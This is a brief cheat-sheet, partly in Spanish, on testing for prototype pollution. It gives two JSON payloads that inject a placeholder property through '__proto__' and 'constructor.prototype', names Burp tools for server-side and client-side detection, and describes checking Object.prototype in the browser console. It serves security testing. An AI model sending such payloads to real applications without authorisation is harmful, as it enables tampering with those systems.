Prototype pollution

Server-side prototype pollution

JSON-based input

{
    "__proto__":{
        "evilProperty": "evilValue"
    }
}

{
    "constructor": {
        "prototype": {
            "evilProperty": "evilValue"
        }
    }
}

Herramientas

• Server-side prototype pollution scanner (Burp extension)

Client-side prototype pollution

En la consola del navegador, inspeccionar Object.prototype para verificar si la propiedad ha sido contaminada exitosamente.

Herramientas

• DOM Invader (Burp Suite)